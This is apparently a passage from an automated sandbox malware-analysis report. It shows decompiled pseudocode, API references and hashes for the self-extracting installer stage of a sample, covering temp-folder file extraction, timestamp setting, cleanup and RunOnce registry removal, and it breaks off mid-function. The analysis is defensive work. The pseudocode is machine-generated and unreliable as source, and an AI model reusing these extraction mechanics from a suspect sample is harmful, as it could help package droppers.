                                                				_t28 = __edi;
                                                				_t22 = __ecx;
                                                				_t21 = __ebx;
                                                				_t9 =  *0x2f8004; // 0x404cc811
                                                				_v8 = _t9 ^ _t33;
                                                				_push(__esi);
                                                				_t31 =  *0x2f91e0; // 0x2bc7b60
                                                				if(_t31 != 0) {
                                                					_push(__edi);
                                                					do {
                                                						_t29 = _t31;
                                                						if( *0x2f8a24 == 0 &&  *0x2f9a30 == 0) {
                                                							SetFileAttributesA( *_t31, 0x80); // executed
                                                							DeleteFileA( *_t31); // executed
                                                						}
                                                						_t31 = _t31[1];
                                                						LocalFree( *_t29);
                                                						LocalFree(_t29);
                                                					} while (_t31 != 0);
                                                					_pop(_t28);
                                                				}
                                                				_t11 =  *0x2f8a20; // 0x0
                                                				_pop(_t32);
                                                				if(_t11 != 0 &&  *0x2f8a24 == 0 &&  *0x2f9a30 == 0) {
                                                					_push(_t22);
                                                					E002F1781( &_v268, 0x104, _t22, "C:\Users\alfons\AppData\Local\Temp\IXP003.TMP\");
                                                					if(( *0x2f9a34 & 0x00000020) != 0) {
                                                						E002F65E8( &_v268);
                                                					}
                                                					SetCurrentDirectoryA(".."); // executed
                                                					_t22 =  &_v268;
                                                					E002F2390( &_v268);
                                                					_t11 =  *0x2f8a20; // 0x0
                                                				}
                                                				if( *0x2f9a40 != 1 && _t11 != 0) {
                                                					_t11 = E002F1FE1(_t22); // executed
                                                				}
                                                				 *0x2f8a20 =  *0x2f8a20 & 0x00000000;
                                                				return E002F6CE0(_t11, _t21, _v8 ^ _t33, 0x104, _t28, _t32);
                                                			}












                                                0x002f52b6
                                                0x002f52b6
                                                0x002f52b6
                                                0x002f52c1
                                                0x002f52c8
                                                0x002f52cb
                                                0x002f52cc
                                                0x002f52d4
                                                0x002f52d6
                                                0x002f52d7
                                                0x002f52de
                                                0x002f52e0
                                                0x002f52f2
                                                0x002f52fa
                                                0x002f52fa
                                                0x002f5302
                                                0x002f5305
                                                0x002f530c
                                                0x002f5312
                                                0x002f5316
                                                0x002f5316
                                                0x002f5317
                                                0x002f531c
                                                0x002f531f
                                                0x002f5333
                                                0x002f5345
                                                0x002f5351
                                                0x002f5359
                                                0x002f5359
                                                0x002f5363
                                                0x002f5369
                                                0x002f536f
                                                0x002f5374
                                                0x002f5374
                                                0x002f5381
                                                0x002f5387
                                                0x002f5387
                                                0x002f538f
                                                0x002f53a0

                                                APIs
                                                • SetFileAttributesA.KERNELBASE(02BC7B60,00000080,?,00000000), ref: 002F52F2
                                                • DeleteFileA.KERNELBASE(02BC7B60), ref: 002F52FA
                                                • LocalFree.KERNEL32(02BC7B60,?,00000000), ref: 002F5305
                                                • LocalFree.KERNEL32(02BC7B60), ref: 002F530C
                                                • SetCurrentDirectoryA.KERNELBASE(002F11FC,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\), ref: 002F5363
                                                Strings
                                                • C:\Users\user\AppData\Local\Temp\IXP003.TMP\, xrefs: 002F5334
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.371408644.00000000002F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002F0000, based on PE: true
                                                • Associated: 00000003.00000002.371399319.00000000002F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371420971.00000000002F8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371427117.00000000002FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371427117.00000000002FC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_2f0000_will3971.jbxd
                                                Similarity
                                                • API ID: FileFreeLocal$AttributesCurrentDeleteDirectory
                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\
                                                • API String ID: 2833751637-3249786385
                                                • Opcode ID: ef07358b9d34f0f8c96daaf7e654ef21f96a2ca6f16ae7b1be89a693e58e1d29
                                                • Instruction ID: 79ba7e73619cca80b86e55ea44aaaeaf1a6040dbd1886965ade2085208c4e1dd
                                                • Opcode Fuzzy Hash: ef07358b9d34f0f8c96daaf7e654ef21f96a2ca6f16ae7b1be89a693e58e1d29
                                                • Instruction Fuzzy Hash: 8C21893192062ADBDB20AF14FD0DB79B7A4EB107E0F5401B9EA46521A0CFB45CA4CB41
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E002F1FE1(void* __ecx) {
                                                				void* _v8;
                                                				long _t4;
                                                
                                                				if( *0x2f8530 != 0) {
                                                					_t4 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x20006,  &_v8); // executed
                                                					if(_t4 == 0) {
                                                						RegDeleteValueA(_v8, "wextract_cleanup3"); // executed
                                                						return RegCloseKey(_v8);
                                                					}
                                                				}
                                                				return _t4;
                                                			}





                                                0x002f1fee
                                                0x002f2005
                                                0x002f200d
                                                0x002f2017
                                                0x00000000
                                                0x002f2020
                                                0x002f200d
                                                0x002f2029

                                                APIs
                                                • RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00020006,002F538C,?,?,002F538C), ref: 002F2005
                                                • RegDeleteValueA.KERNELBASE(002F538C,wextract_cleanup3,?,?,002F538C), ref: 002F2017
                                                • RegCloseKey.ADVAPI32(002F538C,?,?,002F538C), ref: 002F2020
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.371408644.00000000002F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002F0000, based on PE: true
                                                • Associated: 00000003.00000002.371399319.00000000002F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371420971.00000000002F8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371427117.00000000002FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371427117.00000000002FC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_2f0000_will3971.jbxd
                                                Similarity
                                                • API ID: CloseDeleteOpenValue
                                                • String ID: Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup3
                                                • API String ID: 849931509-2968168367
                                                • Opcode ID: 57a2e65e823c9b76f601b047037e962d746ad5697f3900e0240150cb009071a3
                                                • Instruction ID: 595c3589b6781b021a57ecd4cc783fa3fbe896b3fb5801bacec0fdb30b7fc9dc
                                                • Opcode Fuzzy Hash: 57a2e65e823c9b76f601b047037e962d746ad5697f3900e0240150cb009071a3
                                                • Instruction Fuzzy Hash: C8E01A7156031CBBDB218F90BC0EF79FA2AE701BD0F5001B8BA08A00A0EF615A28D605
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 94%
                                                			E002F4CD0(char* __edx, long _a4, int _a8) {
                                                				signed int _v8;
                                                				char _v268;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t29;
                                                				int _t30;
                                                				long _t32;
                                                				signed int _t33;
                                                				long _t35;
                                                				long _t36;
                                                				struct HWND__* _t37;
                                                				long _t38;
                                                				long _t39;
                                                				long _t41;
                                                				long _t44;
                                                				long _t45;
                                                				long _t46;
                                                				signed int _t50;
                                                				long _t51;
                                                				char* _t58;
                                                				long _t59;
                                                				char* _t63;
                                                				long _t64;
                                                				CHAR* _t71;
                                                				CHAR* _t74;
                                                				int _t75;
                                                				signed int _t76;
                                                
                                                				_t69 = __edx;
                                                				_t29 =  *0x2f8004; // 0x404cc811
                                                				_t30 = _t29 ^ _t76;
                                                				_v8 = _t30;
                                                				_t75 = _a8;
                                                				if( *0x2f91d8 == 0) {
                                                					_t32 = _a4;
                                                					__eflags = _t32;
                                                					if(_t32 == 0) {
                                                						_t33 = E002F4E99(_t75);
                                                						L35:
                                                						return E002F6CE0(_t33, _t54, _v8 ^ _t76, _t69, _t73, _t75);
                                                					}
                                                					_t35 = _t32 - 1;
                                                					__eflags = _t35;
                                                					if(_t35 == 0) {
                                                						L9:
                                                						_t33 = 0;
                                                						goto L35;
                                                					}
                                                					_t36 = _t35 - 1;
                                                					__eflags = _t36;
                                                					if(_t36 == 0) {
                                                						_t37 =  *0x2f8584; // 0x0
                                                						__eflags = _t37;
                                                						if(_t37 != 0) {
                                                							SetDlgItemTextA(_t37, 0x837,  *(_t75 + 4));
                                                						}
                                                						_t54 = 0x2f91e4;
                                                						_t58 = 0x2f91e4;
                                                						do {
                                                							_t38 =  *_t58;
                                                							_t58 =  &(_t58[1]);
                                                							__eflags = _t38;
                                                						} while (_t38 != 0);
                                                						_t59 = _t58 - 0x2f91e5;
                                                						__eflags = _t59;
                                                						_t71 =  *(_t75 + 4);
                                                						_t73 =  &(_t71[1]);
                                                						do {
                                                							_t39 =  *_t71;
                                                							_t71 =  &(_t71[1]);
                                                							__eflags = _t39;
                                                						} while (_t39 != 0);
                                                						_t69 = _t71 - _t73;
                                                						_t30 = _t59 + 1 + _t71 - _t73;
                                                						__eflags = _t30 - 0x104;
                                                						if(_t30 >= 0x104) {
                                                							L3:
                                                							_t33 = _t30 | 0xffffffff;
                                                							goto L35;
                                                						}
                                                						_t69 = 0x2f91e4;
                                                						_t30 = E002F4702( &_v268, 0x2f91e4,  *(_t75 + 4));
                                                						__eflags = _t30;
                                                						if(__eflags == 0) {
                                                							goto L3;
                                                						}
                                                						_t41 = E002F476D( &_v268, __eflags);
                                                						__eflags = _t41;
                                                						if(_t41 == 0) {
                                                							goto L9;
                                                						}
                                                						_push(0x180);
                                                						_t30 = E002F4980( &_v268, 0x8302); // executed
                                                						_t75 = _t30;
                                                						__eflags = _t75 - 0xffffffff;
                                                						if(_t75 == 0xffffffff) {
                                                							goto L3;
                                                						}
                                                						_t30 = E002F47E0( &_v268);
                                                						__eflags = _t30;
                                                						if(_t30 == 0) {
                                                							goto L3;
                                                						}
                                                						 *0x2f93f4 =  *0x2f93f4 + 1;
                                                						_t33 = _t75;
                                                						goto L35;
                                                					}
                                                					_t44 = _t36 - 1;
                                                					__eflags = _t44;
                                                					if(_t44 == 0) {
                                                						_t54 = 0x2f91e4;
                                                						_t63 = 0x2f91e4;
                                                						do {
                                                							_t45 =  *_t63;
                                                							_t63 =  &(_t63[1]);
                                                							__eflags = _t45;
                                                						} while (_t45 != 0);
                                                						_t74 =  *(_t75 + 4);
                                                						_t64 = _t63 - 0x2f91e5;
                                                						__eflags = _t64;
                                                						_t69 =  &(_t74[1]);
                                                						do {
                                                							_t46 =  *_t74;
                                                							_t74 =  &(_t74[1]);
                                                							__eflags = _t46;
                                                						} while (_t46 != 0);
                                                						_t73 = _t74 - _t69;
                                                						_t30 = _t64 + 1 + _t74 - _t69;
                                                						__eflags = _t30 - 0x104;
                                                						if(_t30 >= 0x104) {
                                                							goto L3;
                                                						}
                                                						_t69 = 0x2f91e4;
                                                						_t30 = E002F4702( &_v268, 0x2f91e4,  *(_t75 + 4));
                                                						__eflags = _t30;
                                                						if(_t30 == 0) {
                                                							goto L3;
                                                						}
                                                						_t69 =  *((intOrPtr*)(_t75 + 0x18));
                                                						_t30 = E002F4C37( *((intOrPtr*)(_t75 + 0x14)),  *((intOrPtr*)(_t75 + 0x18)),  *(_t75 + 0x1a) & 0x0000ffff); // executed
                                                						__eflags = _t30;
                                                						if(_t30 == 0) {
                                                							goto L3;
                                                						}
                                                						E002F4B60( *((intOrPtr*)(_t75 + 0x14))); // executed
                                                						_t50 =  *(_t75 + 0x1c) & 0x0000ffff;
                                                						__eflags = _t50;
                                                						if(_t50 != 0) {
                                                							_t51 = _t50 & 0x00000027;
                                                							__eflags = _t51;
                                                						} else {
                                                							_t51 = 0x80;
                                                						}
                                                						_t30 = SetFileAttributesA( &_v268, _t51); // executed
                                                						__eflags = _t30;
                                                						if(_t30 == 0) {
                                                							goto L3;
                                                						} else {
                                                							_t33 = 1;
                                                							goto L35;
                                                						}
                                                					}
                                                					_t30 = _t44 - 1;
                                                					__eflags = _t30;
                                                					if(_t30 == 0) {
                                                						goto L3;
                                                					}
                                                					goto L9;
                                                				}
                                                				if(_a4 == 3) {
                                                					_t30 = E002F4B60( *((intOrPtr*)(_t75 + 0x14)));
                                                				}
                                                				goto L3;
                                                			}































                                                0x002f4cd0
                                                0x002f4cdb
                                                0x002f4ce0
                                                0x002f4ce2
                                                0x002f4cee
                                                0x002f4cf2
                                                0x002f4d0e
                                                0x002f4d0e
                                                0x002f4d11
                                                0x002f4e83
                                                0x002f4e88
                                                0x002f4e98
                                                0x002f4e98
                                                0x002f4d17
                                                0x002f4d17
                                                0x002f4d1a
                                                0x002f4d2f
                                                0x002f4d2f
                                                0x00000000
                                                0x002f4d2f
                                                0x002f4d1c
                                                0x002f4d1c
                                                0x002f4d1f
                                                0x002f4dcb
                                                0x002f4dd0
                                                0x002f4dd2
                                                0x002f4ddd
                                                0x002f4ddd
                                                0x002f4de3
                                                0x002f4de8
                                                0x002f4ded
                                                0x002f4ded
                                                0x002f4def
                                                0x002f4df0
                                                0x002f4df0
                                                0x002f4df4
                                                0x002f4df4
                                                0x002f4df6
                                                0x002f4df9
                                                0x002f4dfc
                                                0x002f4dfc
                                                0x002f4dfe
                                                0x002f4dff
                                                0x002f4dff
                                                0x002f4e03
                                                0x002f4e08
                                                0x002f4e0a
                                                0x002f4e0f
                                                0x002f4d03
                                                0x002f4d03
                                                0x00000000
                                                0x002f4d03
                                                0x002f4e18
                                                0x002f4e20
                                                0x002f4e25
                                                0x002f4e27
                                                0x00000000
                                                0x00000000
                                                0x002f4e33
                                                0x002f4e38
                                                0x002f4e3a
                                                0x00000000
                                                0x00000000
                                                0x002f4e40
                                                0x002f4e51
                                                0x002f4e56
                                                0x002f4e5b
                                                0x002f4e5e
                                                0x00000000
                                                0x00000000
                                                0x002f4e6a
                                                0x002f4e6f
                                                0x002f4e71
                                                0x00000000
                                                0x00000000
                                                0x002f4e77
                                                0x002f4e7d
                                                0x00000000
                                                0x002f4e7d
                                                0x002f4d25
                                                0x002f4d25
                                                0x002f4d28
                                                0x002f4d36
                                                0x002f4d3b
                                                0x002f4d40
                                                0x002f4d40
                                                0x002f4d42
                                                0x002f4d43
                                                0x002f4d43
                                                0x002f4d47
                                                0x002f4d4a
                                                0x002f4d4a
                                                0x002f4d4c
                                                0x002f4d4f
                                                0x002f4d4f
                                                0x002f4d51
                                                0x002f4d52
                                                0x002f4d52
                                                0x002f4d56
                                                0x002f4d5b
                                                0x002f4d5d
                                                0x002f4d62
                                                0x00000000
                                                0x00000000
                                                0x002f4d67
                                                0x002f4d6f
                                                0x002f4d74
                                                0x002f4d76
                                                0x00000000
                                                0x00000000
                                                0x002f4d7c
                                                0x002f4d84
                                                0x002f4d89
                                                0x002f4d8b
                                                0x00000000
                                                0x00000000
                                                0x002f4d94
                                                0x002f4d99
                                                0x002f4d9e
                                                0x002f4da1
                                                0x002f4daa
                                                0x002f4daa
                                                0x002f4da3
                                                0x002f4da3
                                                0x002f4da3
                                                0x002f4db5
                                                0x002f4dbb
                                                0x002f4dbd
                                                0x00000000
                                                0x002f4dc3
                                                0x002f4dc5
                                                0x00000000
                                                0x002f4dc5
                                                0x002f4dbd
                                                0x002f4d2a
                                                0x002f4d2a
                                                0x002f4d2d
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x002f4d2d
                                                0x002f4cf8
                                                0x002f4cfd
                                                0x002f4d02
                                                0x00000000

                                                APIs
                                                • SetFileAttributesA.KERNELBASE(?,?,?,?), ref: 002F4DB5
                                                • SetDlgItemTextA.USER32(00000000,00000837,?), ref: 002F4DDD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.371408644.00000000002F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002F0000, based on PE: true
                                                • Associated: 00000003.00000002.371399319.00000000002F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371420971.00000000002F8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371427117.00000000002FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371427117.00000000002FC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_2f0000_will3971.jbxd
                                                Similarity
                                                • API ID: AttributesFileItemText
                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\
                                                • API String ID: 3625706803-3249786385
                                                • Opcode ID: 0bac595eb4511cfab870c8b33b309775d4c14d21b2e7d0da666f2c85505ddb4b
                                                • Instruction ID: 140a961997a1d4b55b8ac6b62cfb086955b5b421826ec8c023a52eb6b0a3a368
                                                • Opcode Fuzzy Hash: 0bac595eb4511cfab870c8b33b309775d4c14d21b2e7d0da666f2c85505ddb4b
                                                • Instruction Fuzzy Hash: 8741573522010E87CB24BF28DC08AB7F3A4EB457C0B044678DA8697285DBF1EE66CB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E002F4C37(signed int __ecx, int __edx, int _a4) {
                                                				struct _FILETIME _v12;
                                                				struct _FILETIME _v20;
                                                				FILETIME* _t14;
                                                				int _t15;
                                                				signed int _t21;
                                                
                                                				_t21 = __ecx * 0x18;
                                                				if( *((intOrPtr*)(_t21 + 0x2f8d64)) == 1 || DosDateTimeToFileTime(__edx, _a4,  &_v20) == 0 || LocalFileTimeToFileTime( &_v20,  &_v12) == 0) {
                                                					L5:
                                                					return 0;
                                                				} else {
                                                					_t14 =  &_v12;
                                                					_t15 = SetFileTime( *(_t21 + 0x2f8d74), _t14, _t14, _t14); // executed
                                                					if(_t15 == 0) {
                                                						goto L5;
                                                					}
                                                					return 1;
                                                				}
                                                			}








                                                0x002f4c40
                                                0x002f4c4a
                                                0x002f4c8d
                                                0x00000000
                                                0x002f4c70
                                                0x002f4c70
                                                0x002f4c7e
                                                0x002f4c86
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x002f4c8a

                                                APIs
                                                • DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 002F4C54
                                                • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 002F4C66
                                                • SetFileTime.KERNELBASE(?,?,?,?), ref: 002F4C7E
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.371408644.00000000002F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002F0000, based on PE: true
                                                • Associated: 00000003.00000002.371399319.00000000002F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371420971.00000000002F8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371427117.00000000002FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371427117.00000000002FC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_2f0000_will3971.jbxd
                                                Similarity
                                                • API ID: Time$File$DateLocal
                                                • String ID:
                                                • API String ID: 2071732420-0
                                                • Opcode ID: d506994bac7bbb6491428a92e95cfc02a29c9d182b1de686464373662f78ed6c
                                                • Instruction ID: 64f7ac29796213c41ed0174185bfd5432e25f4e9a92f57f38600fb886bf64be8
                                                • Opcode Fuzzy Hash: d506994bac7bbb6491428a92e95cfc02a29c9d182b1de686464373662f78ed6c
                                                • Instruction Fuzzy Hash: A5F0627251110DAA9B14AFB4DC49DBBB7ACEB04290744453BA919C1050EA70D928C760
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 75%
                                                			E002F487A(CHAR* __ecx, signed int __edx) {
                                                				void* _t7;
                                                				CHAR* _t11;
                                                				long _t18;
                                                				long _t23;
                                                
                                                				_t11 = __ecx;
                                                				asm("sbb edi, edi");
                                                				_t18 = ( ~(__edx & 3) & 0xc0000000) + 0x80000000;
                                                				if((__edx & 0x00000100) == 0) {
                                                					asm("sbb esi, esi");
                                                					_t23 = ( ~(__edx & 0x00000200) & 0x00000002) + 3;
                                                				} else {
                                                					if((__edx & 0x00000400) == 0) {
                                                						asm("sbb esi, esi");
                                                						_t23 = ( ~(__edx & 0x00000200) & 0xfffffffe) + 4;
                                                					} else {
                                                						_t23 = 1;
                                                					}
                                                				}
                                                				_t7 = CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0); // executed
                                                				if(_t7 != 0xffffffff || _t23 == 3) {
                                                					return _t7;
                                                				} else {
                                                					E002F490C(_t11);
                                                					return CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0);
                                                				}
                                                			}







                                                0x002f4880
                                                0x002f488c
                                                0x002f4894
                                                0x002f48a0
                                                0x002f48c9
                                                0x002f48ce
                                                0x002f48a2
                                                0x002f48a8
                                                0x002f48b7
                                                0x002f48bc
                                                0x002f48aa
                                                0x002f48ac
                                                0x002f48ac
                                                0x002f48a8
                                                0x002f48de
                                                0x002f48e7
                                                0x002f490b
                                                0x002f48ee
                                                0x002f48f0
                                                0x00000000
                                                0x002f4902

                                                APIs
                                                • CreateFileA.KERNELBASE(00008000,-80000000,00000000,00000000,?,00000080,00000000,00000000,00000000,00000000,002F4A23,?,002F4F67,*MEMCAB,00008000,00000180), ref: 002F48DE
                                                • CreateFileA.KERNEL32(00008000,-80000000,00000000,00000000,?,00000080,00000000,?,002F4F67,*MEMCAB,00008000,00000180), ref: 002F4902
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.371408644.00000000002F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002F0000, based on PE: true
                                                • Associated: 00000003.00000002.371399319.00000000002F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371420971.00000000002F8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371427117.00000000002FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371427117.00000000002FC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_2f0000_will3971.jbxd
                                                Similarity
                                                • API ID: CreateFile
                                                • String ID:
                                                • API String ID: 823142352-0
                                                • Opcode ID: 8146c70d7d0f7612cdb3a8d14651a44db3a8afc714c9ffd08f306850fdeef512
                                                • Instruction ID: ef247f011443b54957e233a28d075c4e90ac646ed3caefa911e3d782ec3f50b6
                                                • Opcode Fuzzy Hash: 8146c70d7d0f7612cdb3a8d14651a44db3a8afc714c9ffd08f306850fdeef512
                                                • Instruction Fuzzy Hash: 61014BA3E2257826F32460395C89FB7951CCB96BB4F1B0335BEAAE71D1D5A45C1481E0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 93%
                                                			E002F4AD0(signed int _a4, void* _a8, long _a12) {
                                                				signed int _t9;
                                                				int _t12;
                                                				signed int _t14;
                                                				signed int _t15;
                                                				void* _t20;
                                                				struct HWND__* _t21;
                                                				signed int _t24;
                                                				signed int _t25;
                                                
                                                				_t20 =  *0x2f858c; // 0x268
                                                				_t9 = E002F3680(_t20);
                                                				if( *0x2f91d8 == 0) {
                                                					_push(_t24);
                                                					_t12 = WriteFile( *(0x2f8d74 + _a4 * 0x18), _a8, _a12,  &_a12, 0); // executed
                                                					if(_t12 != 0) {
                                                						_t25 = _a12;
                                                						if(_t25 != 0xffffffff) {
                                                							_t14 =  *0x2f9400; // 0x56200
                                                							_t15 = _t14 + _t25;
                                                							 *0x2f9400 = _t15;
                                                							if( *0x2f8184 != 0) {
                                                								_t21 =  *0x2f8584; // 0x0
                                                								if(_t21 != 0) {
                                                									SendDlgItemMessageA(_t21, 0x83a, 0x402, _t15 * 0x64 /  *0x2f93f8, 0);
                                                								}
                                                							}
                                                						}
                                                					} else {
                                                						_t25 = _t24 | 0xffffffff;
                                                					}
                                                					return _t25;
                                                				} else {
                                                					return _t9 | 0xffffffff;
                                                				}
                                                			}











                                                0x002f4ad5
                                                0x002f4adb
                                                0x002f4ae7
                                                0x002f4aee
                                                0x002f4b05
                                                0x002f4b0d
                                                0x002f4b14
                                                0x002f4b1a
                                                0x002f4b1c
                                                0x002f4b21
                                                0x002f4b2a
                                                0x002f4b2f
                                                0x002f4b31
                                                0x002f4b39
                                                0x002f4b54
                                                0x002f4b54
                                                0x002f4b39
                                                0x002f4b2f
                                                0x002f4b0f
                                                0x002f4b0f
                                                0x002f4b0f
                                                0x002f4b5e
                                                0x002f4ae9
                                                0x002f4aed
                                                0x002f4aed

                                                APIs
                                                  • Part of subcall function 002F3680: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 002F369F
                                                  • Part of subcall function 002F3680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 002F36B2
                                                  • Part of subcall function 002F3680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 002F36DA
                                                • WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 002F4B05
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.371408644.00000000002F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002F0000, based on PE: true
                                                • Associated: 00000003.00000002.371399319.00000000002F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371420971.00000000002F8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371427117.00000000002FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371427117.00000000002FC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_2f0000_will3971.jbxd
                                                Similarity
                                                • API ID: MessagePeek$FileMultipleObjectsWaitWrite
                                                • String ID:
                                                • API String ID: 1084409-0
                                                • Opcode ID: 24cdd3d48b9e03746755bb751e84e57b3489b0a8eeb56eba090ce690d35e1857
                                                • Instruction ID: 7ebea763b8e810f0ff5435d60960a5fdd463ebe142b2f303d2af9225c62c933d
                                                • Opcode Fuzzy Hash: 24cdd3d48b9e03746755bb751e84e57b3489b0a8eeb56eba090ce690d35e1857
                                                • Instruction Fuzzy Hash: 57018031610209ABD7149F68EC09FB7B759AB447B9F048235FA39972F1CBB0D861CB40
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E002F658A(char* __ecx, void* __edx, char* _a4) {
                                                				intOrPtr _t4;
                                                				char* _t6;
                                                				char* _t8;
                                                				void* _t10;
                                                				void* _t12;
                                                				char* _t16;
                                                				intOrPtr* _t17;
                                                				void* _t18;
                                                				char* _t19;
                                                
                                                				_t16 = __ecx;
                                                				_t10 = __edx;
                                                				_t17 = __ecx;
                                                				_t1 = _t17 + 1; // 0x2f8b3f
                                                				_t12 = _t1;
                                                				do {
                                                					_t4 =  *_t17;
                                                					_t17 = _t17 + 1;
                                                				} while (_t4 != 0);
                                                				_t18 = _t17 - _t12;
                                                				_t2 = _t18 + 1; // 0x2f8b40
                                                				if(_t2 < __edx) {
                                                					_t19 = _t18 + __ecx;
                                                					if(_t19 > __ecx) {
                                                						_t8 = CharPrevA(__ecx, _t19); // executed
                                                						if( *_t8 != 0x5c) {
                                                							 *_t19 = 0x5c;
                                                							_t19 =  &(_t19[1]);
                                                						}
                                                					}
                                                					_t6 = _a4;
                                                					 *_t19 = 0;
                                                					while( *_t6 == 0x20) {
                                                						_t6 = _t6 + 1;
                                                					}
                                                					return E002F16B3(_t16, _t10, _t6);
                                                				}
                                                				return 0x8007007a;
                                                			}












                                                0x002f6592
                                                0x002f6594
                                                0x002f6596
                                                0x002f6598
                                                0x002f6598
                                                0x002f659b
                                                0x002f659b
                                                0x002f659d
                                                0x002f659e
                                                0x002f65a2
                                                0x002f65a4
                                                0x002f65a9
                                                0x002f65b2
                                                0x002f65b6
                                                0x002f65ba
                                                0x002f65c3
                                                0x002f65c5
                                                0x002f65c8
                                                0x002f65c8
                                                0x002f65c3
                                                0x002f65c9
                                                0x002f65cc
                                                0x002f65d2
                                                0x002f65d1
                                                0x002f65d1
                                                0x00000000
                                                0x002f65dc
                                                0x00000000

                                                APIs
                                                • CharPrevA.USER32(002F8B3E,002F8B3F,00000001,002F8B3E,-00000003,?,002F60EC,002F1140,?), ref: 002F65BA
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.371408644.00000000002F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002F0000, based on PE: true
                                                • Associated: 00000003.00000002.371399319.00000000002F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371420971.00000000002F8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371427117.00000000002FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371427117.00000000002FC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_2f0000_will3971.jbxd
                                                Similarity
                                                • API ID: CharPrev
                                                • String ID:
                                                • API String ID: 122130370-0
                                                • Opcode ID: 1fd71b2357ddd44a9511d407068db38720f07696613ba280b536312b9e869191
                                                • Instruction ID: b7e56df255f301d1abb8d657d8639a9ccf95d24fbd0b15063d01c3c6cac59b75
                                                • Opcode Fuzzy Hash: 1fd71b2357ddd44a9511d407068db38720f07696613ba280b536312b9e869191
                                                • Instruction Fuzzy Hash: F1F07D321142599BD7310919988CB76FFCEDB863D0F54017AEADEE3205CA954C1182A0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 93%
                                                			E002F621E() {
